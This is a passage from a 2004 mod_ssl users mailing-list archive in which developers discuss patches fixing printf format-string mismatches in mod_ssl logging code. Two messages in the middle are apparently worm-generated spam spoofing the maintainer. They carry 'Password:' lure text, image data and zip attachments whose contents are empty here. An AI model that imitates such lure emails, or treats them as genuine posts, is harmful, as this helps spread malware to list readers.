Apache 2.x is not affected). A mod_ssl 2.8.19 for Apache 1.3.31 was
created which fixes this potential security hole.

Get mod_ssl-2.8.19-1.3.31.tar.gz from:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 16 23:11:25 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 48797A8963; Fri, 16 Jul 2004 23:11:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 286E9A893A
	for ; Fri, 16 Jul 2004 23:11:08 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i6GLB5e1003075
	for ; Fri, 16 Jul 2004 17:11:05 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i6GLB4a28593
	for ; Fri, 16 Jul 2004 17:11:04 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i6GLB37m006242
	for ; Fri, 16 Jul 2004 22:11:03 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i6GLB3Au006241
	for modssl-users@modssl.org; Fri, 16 Jul 2004 22:11:03 +0100
Date: Fri, 16 Jul 2004 22:11:03 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
Message-ID: <20040716211102.GA6223@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <20040716204207.GA45678@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <20040716204207.GA45678@engelschall.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm checking an older version of mod_ssl but there are a couple of other
uninteresting format string warnings from gcc.  I think it's portable to
assume time_t is a long...

--- ./ssl_engine_io.c.warnings	2002-02-23 18:45:45.000000000 +0000
+++ ./ssl_engine_io.c	2004-07-16 22:02:32.000000000 +0100
@@ -680,7 +680,7 @@
     }
     if (trunc > 0)
         ssl_log(srvr, SSL_LOG_DEBUG|SSL_NO_TIMESTAMP|SSL_NO_LEVELID,
-                "| %04x - ", len + trunc);
+                "| %04lx - ", len + trunc);
     ssl_log(srvr, SSL_LOG_DEBUG|SSL_NO_TIMESTAMP|SSL_NO_LEVELID,
             "+-------------------------------------------------------------------------+");
     return;
--- ./mod_ssl.h.warnings	2004-07-16 21:52:26.000000000 +0100
+++ ./mod_ssl.h	2004-07-16 21:58:19.000000000 +0100
@@ -806,7 +806,9 @@
 /*  Logfile Support  */
 void         ssl_log_open(server_rec *, server_rec *, pool *);
 BOOL         ssl_log_applies(server_rec *, int);
-void         ssl_log(server_rec *, int, const char *, ...);
+void         ssl_log(server_rec *, int, const char *, ...)
+         __attribute__((format(printf,3,4)));
+
 void         ssl_die(void);
 
 /*  Variables  */
--- ./ssl_engine_kernel.c.warnings	2004-07-16 21:52:26.000000000 +0100
+++ ./ssl_engine_kernel.c	2004-07-16 22:00:41.000000000 +0100
@@ -1807,7 +1807,7 @@
      * Log this cache operation
      */
     ssl_log(s, SSL_LOG_TRACE, "Inter-Process Session Cache: "
-            "request=SET status=%s id=%s timeout=%ds (session caching)",
+            "request=SET status=%s id=%s timeout=%lds (session caching)",
             rc == TRUE ? "OK" : "BAD",
             SSL_SESSION_id2sz(pNew->session_id, pNew->session_id_length),
             t-time(NULL));

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 17 08:57:17 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 91B04A8A4D; Sat, 17 Jul 2004 08:57:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id F1536A8999
	for ; Sat, 17 Jul 2004 08:57:16 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E11664CE603; Sat, 17 Jul 2004 08:57:16 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 76BB1285F7; Sat, 17 Jul 2004 08:57:09 +0200 (CEST)
Date: Sat, 17 Jul 2004 08:57:09 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
Message-ID: <20040717065709.GA29039@engelschall.com>
References: <20040716204207.GA45678@engelschall.com> <20040716211102.GA6223@redhat.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20040716211102.GA6223@redhat.com>
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jul 16, 2004, Joe Orton wrote:

> I'm checking an older version of mod_ssl but there are a couple of other
> uninteresting format string warnings from gcc.  I think it's portable to
> assume time_t is a long...
> [...]

Yes, although they are not security related, they could crash the
server, too. So we should fix those formatting bugs, too. A little bit
of extra casting might be required, I think. I've now committed to my
CVS for mod_ssl 2.8.20 the following patch. Thanks for your feedback.
Please commit a similar patch to mod_ssl for Apache 2.x, please.

Index: ssl_engine_io.c
===================================================================
RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_io.c,v
retrieving revision 1.36
diff -u -d -r1.36 ssl_engine_io.c
--- ssl_engine_io.c	11 May 2004 18:44:15 -0000	1.36
+++ ssl_engine_io.c	17 Jul 2004 06:52:22 -0000
@@ -682,7 +682,7 @@
     }
     if (trunc > 0)
         ssl_log(srvr, SSL_LOG_DEBUG|SSL_NO_TIMESTAMP|SSL_NO_LEVELID,
-                "| %04x - ", len + trunc);
+                "| %04lx - ", len + trunc);
     ssl_log(srvr, SSL_LOG_DEBUG|SSL_NO_TIMESTAMP|SSL_NO_LEVELID,
             "+-------------------------------------------------------------------------+");
     return;
@@ -704,21 +704,21 @@
         || cmd == (BIO_CB_READ |BIO_CB_RETURN) ) {
         if (rc >= 0) {
             ssl_log(s, SSL_LOG_DEBUG,
-                    "%s: %s %ld/%d bytes %s BIO#%08X [mem: %08lX] %s",
+                    "%s: %s %ld/%d bytes %s BIO#%08lX [mem: %08lX] %s",
                     SSL_LIBRARY_NAME,
                     (cmd == (BIO_CB_WRITE|BIO_CB_RETURN) ? "write" : "read"),
                     rc, argi, (cmd == (BIO_CB_WRITE|BIO_CB_RETURN) ? "to" : "from"),
-                    bio, argp,
+                    (long)bio, (long)argp,
                     (argp != NULL ? "(BIO dump follows)" : "(Ops, no memory buffer?)"));
             if (argp != NULL)
                 ssl_io_data_dump(s, argp, rc);
         }
         else {
             ssl_log(s, SSL_LOG_DEBUG,
-                    "%s: I/O error, %d bytes expected to %s on BIO#%08X [mem: %08lX]",
+                    "%s: I/O error, %d bytes expected to %s on BIO#%08lX [mem: %08lX]",
                     SSL_LIBRARY_NAME, argi,
                     (cmd == (BIO_CB_WRITE|BIO_CB_RETURN) ? "write" : "read"),
-                    bio, argp);
+                    (long)bio, (long)argp);
         }
     }
     return rc;
Index: ssl_engine_kernel.c
===================================================================
RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_kernel.c,v
retrieving revision 1.146
diff -u -d -r1.146 ssl_engine_kernel.c
--- ssl_engine_kernel.c	27 May 2004 13:13:32 -0000	1.146
+++ ssl_engine_kernel.c	17 Jul 2004 06:50:10 -0000
@@ -1793,10 +1793,10 @@
      * Log this cache operation
      */
     ssl_log(s, SSL_LOG_TRACE, "Inter-Process Session Cache: "
-            "request=SET status=%s id=%s timeout=%ds (session caching)",
+            "request=SET status=%s id=%s timeout=%lds (session caching)",
             rc == TRUE ? "OK" : "BAD",
             SSL_SESSION_id2sz(pNew->session_id, pNew->session_id_length),
-            t-time(NULL));
+            (long)(t-time(NULL)));

     /*
      * return 0 which means to OpenSSL that the pNew is still

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 17 10:43:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3FF0CA8982; Sat, 17 Jul 2004 10:43:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id B5DA3A893A
	for ; Sat, 17 Jul 2004 10:43:35 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i6H8hWe1023785
	for ; Sat, 17 Jul 2004 04:43:32 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i6H8hVa25861
	for ; Sat, 17 Jul 2004 04:43:32 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i6H8hU7m028628
	for ; Sat, 17 Jul 2004 09:43:30 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i6H8hUmU028627
	for modssl-users@modssl.org; Sat, 17 Jul 2004 09:43:30 +0100
Date: Sat, 17 Jul 2004 09:43:30 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
Message-ID: <20040717084330.GA28615@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <20040716204207.GA45678@engelschall.com> <20040716211102.GA6223@redhat.com> <20040717065709.GA29039@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <20040717065709.GA29039@engelschall.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, Jul 17, 2004 at 08:57:09AM +0200, Ralf S. Engelschall wrote:
> Yes, although they are not security related, they could crash the
> server, too. So we should fix those formatting bugs, too. A little bit
> of extra casting might be required, I think. I've now committed to my
> CVS for mod_ssl 2.8.20 the following patch. Thanks for your feedback.
> Please commit a similar patch to mod_ssl for Apache 2.x, please.

Actually it should just use %pp for printing addresses since the 1.3
ap_snprintf does support that (the 2.0 code does this already).

joe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 18 11:24:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B886A8A85; Sun, 18 Jul 2004 11:24:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cc660743-d.org (slip-12-64-60-237.mis.prserv.net [12.64.60.237])
	by master.modssl.org (Postfix) with SMTP id 70413A8A83
	for ; Sun, 18 Jul 2004 11:24:19 +0200 (CEST)
Date: Sun, 18 Jul 2004 05:23:48 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------rvhzgeaxyxajuvfdwifh"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------rvhzgeaxyxajuvfdwifh
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


Animals




Password: 





----------rvhzgeaxyxajuvfdwifh
Content-Type: image/bmp; name="afdjakbbvx.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="afdjakbbvx.bmp"
Content-ID: 

Qk0uCAAAAAAAADYAAAAoAAAAPAAAABEAAAABABAAAAAAAPgHAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/gHyAfIB8
gHyAfIB8gHyAfIB8gHyAfIB8gHyAfIB8gHyAfIB8gHyAfIB8gHyAfIB8gHyAfIB8gHyAfIB8
gHyAfIB8gHyAfP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/gHyAfP9//3+9f3F+gHyJffZ+/3//f/9/1H6AfIB8
1H7/f/9/vX/tfYB87X1af/9//3+9f3F+gHyJffZ+/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/gHyAfP9//38vfoB8vX84f4B8
1H7/f9R+gHw4f3t/gHzUfv9/k36AfL1/OH+AfJx//39xfoB8vX84f4B89n7/f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/gHyAfIB8gHyAfIB8
/3//f/9//3//f4B8iX3/f4B8gHz/f/9/gHyAfP9//3//f/9//3+AfJN+/3//f/9//3//f4B8
iX3/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
cX5af/9/gHyAfP9//3//f/9//3//f4B8gHz/f4l9gHz/f/9/gHyAfP9//3//f/9//3+AfIl9
/3//f/9//3//f4B8gHz/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9/e39xfv9/gHyAfP9//3//f/9//3//f4B8iX3/f/Z+gHx7f1p/gHz2fv9/
/39xfoB8cX7tfYB8/3//f/9//384f4B8k37/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3/tfZx/gHyAfP9//39xfoB8vX84f4B81H7/f/9/
7X2AfIB8gHzef/9/k36AfHt/nH+AfIB8/3//f/9/7X2AfO19/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39af9R+gHyAfP9//39xfoB8
iX2AfHF+/3//f5N+gHycf5x/gHzUfv9/gHyAfP9//3+AfIB8/3//f/9//38Xf4B8k37/f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f+19
gHyAfP9//38Xf4B8Wn//f/9//3//f4B8gHz/f/9/gHyAfP9/gHyAfP9//3+AfHF+/3//f/9/
/3//f4B8gHz/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fzh/gHyAfP9//397f4B8k37/f/9//3//f3F+gHycf5x/gHxxfv9/1H6AfJx/
OH+AfBd//3+TfoB8vX+cf4B8cX7/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/iX2AfP9//3/ef4B8gHyAfIB8gHz/f71/k36AfIB8
k37ef/9//3/UfoB8iX32fv9//3+9f5N+gHyAfJN+/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------rvhzgeaxyxajuvfdwifh
Content-Type: application/octet-stream; name="foto3.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto3.zip"



----------rvhzgeaxyxajuvfdwifh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 20 12:42:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B9898A8A83; Tue, 20 Jul 2004 12:42:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from LOUIS01.com (pcp02464143pcs.chrchv01.md.comcast.net [68.33.115.109])
	by master.modssl.org (Postfix) with SMTP id 9FBBAA8939
	for ; Tue, 20 Jul 2004 12:42:46 +0200 (CEST)
Date: Tue, 20 Jul 2004 06:37:14 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------pseyeyboajoshosullly"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------pseyeyboajoshosullly
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>fotogalary and Music





 :)





----------pseyeyboajoshosullly
Content-Type: image/gif; name="wvzhedlhhf.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="wvzhedlhhf.gif"
Content-ID: 

R0lGODlhOAAQAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAA4ABAAAAj4AP8JHEiwoMGD
CBMqXMiwocOHECNKRDijRZSKMwauarGn2sCKUaJovHIon8BtpVoEMjnR4KFVAksF+jdjpsAZ
MAc+O1QtSs5YLfLVbFnwWYtt/6q1iFW0Rc5/21p4bNGioEWiA6PmfIYz0CGNM5AKNDr1CsFq
JLGOPSrwkE+hOQ+p7Phv1QyTUaq2nVHKo9pSGQVSRXpRYLV824ZSher0LFusWj+K/HeV4OIZ
ZqvNeGZ1j1qgfv91EZkYplvBX/MmfXyyRRe1q6KI/Wd0W0+kKatpNrmxWqCcq8w+u8IUa+WB
QHkOPFQztN3iSVN2Ca22uvXr2LNXDwgAO3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3+/d18If07/f/9/v1ZfCH9OXylfRr93/3//f39OXwg/Y/9//3//f/9eXwhfZ/9/
XwhfCP9//3//f/9/P2NfCF9G/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+/Vl8Iv3f/f39rXwj/Xv9//3//f/9//3//Xl8Iv1b/f/9//3+/d18I
31r/f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3/fNX9O/3//f19G3zW/d18I3zX/f/9/n29fCF9G/3//f/9/
/3+/Vt81n3NfCH9O/3//f79WXwifc18IH0L/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f18IXwhfCF8IXwhfCP9//3//f39OXwhfKV9n/3//f/9/XwhfCF8I
Xwj/f/9//3+/Vl8IX0a/d/9//3+fcx9CXwjfNZ9z/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fw==

----------pseyeyboajoshosullly
Content-Type: application/octet-stream; name="Garry.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Garry.zip"



----------pseyeyboajoshosullly--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 20 18:19:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D4E85A8A9B; Tue, 20 Jul 2004 18:19:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Cantor.suse.de (cantor.suse.de [195.135.220.2])
	by master.modssl.org (Postfix) with ESMTP id BA633A8A91
	for ; Tue, 20 Jul 2004 18:19:16 +0200 (CEST)
Received: from hermes.suse.de (hermes-ext.suse.de [195.135.221.8])
	(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by Cantor.suse.de (Postfix) with ESMTP id D900290AFDC
	for ; Tue, 20 Jul 2004 18:19:13 +0200 (CEST)
Date: Tue, 20 Jul 2004 18:19:13 +0200
From: Juergen Weigert 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
Message-ID: <20040720161913.GB21064@suse.de>
References: <20040716204207.GA45678@engelschall.com> <20040716211102.GA6223@redhat.com> <20040717065709.GA29039@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20040717065709.GA29039@engelschall.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Juergen Weigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Jul 17, 04 08:57:09 +0200, Ralf S. Engelschall wrote:
> On Fri, Jul 16, 2004, Joe Orton wrote:
> > [...] I think it's portable to  assume time_t is a long...
> > [...]

I'd appreciate  
        assert(sizof(time_t) == sizeof(long));
near that. 
I could not find any glibc supported architecture, where 
that would not hould.

        cheers,
                Jw.

-- 
 o \  Juergen Weigert  paint it green!__/ _=======.=======_
 | jw@suse.de       linux software/        _---|____________\/
 \  | 0911 74053-508   creator  __/          (____/            /\
(/) | _________________________/              _/ \_ vim:set sw=2 wm=8
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 21 00:52:17 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B7A9AA8943; Wed, 21 Jul 2004 00:52:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web53703.mail.yahoo.com (web53703.mail.yahoo.com [206.190.37.24])
	by master.modssl.org (Postfix) with SMTP id C0386A8939
	for ; Wed, 21 Jul 2004 00:52:00 +0200 (CEST)
Message-ID: <20040720225156.22324.qmail@web53703.mail.yahoo.com>
Received: from [24.218.213.21] by web53703.mail.yahoo.com via HTTP; Tue, 20 Jul 2004 15:51:56 PDT
Date: Tue, 20 Jul 2004 15:51:56 -0700 (PDT)
From: a k 
Subject: Re: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
To: modssl-users@modssl.org
In-Reply-To: <20040720161913.GB21064@suse.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a k 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I would prefer either:

#if ...
#error ...
#endif
or
if( ... ) {
    log some easy to understand error
     exit(1)
}



--- Juergen Weigert  wrote:
> On Jul 17, 04 08:57:09 +0200, Ralf S. Engelschall
> wrote:
> > On Fri, Jul 16, 2004, Joe Orton wrote:
> > > [...] I think it's portable to  assume time_t is
> a long...
> > > [...]
> 
> I'd appreciate  
>         assert(sizof(time_t) == sizeof(long));
> near that. 
> I could not find any glibc supported architecture,
> where 
> that would not hould.
> 
>         cheers,
>                 Jw.
> 
> -- 
>  o \  Juergen Weigert  paint it green!__/
> _=======.=======_
>  | jw@suse.de       linux software/       
> _---|____________\/
>  \  | 0911 74053-508   creator  __/          (____/ 
>           /\
> (/) | _________________________/              _/ \_
> vim:set sw=2 wm=8
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
__________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.
http://promotions.yahoo.com/new_mail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 21 11:36:01 2004
Return-Path: 
X-Original-To: modssl-users-L
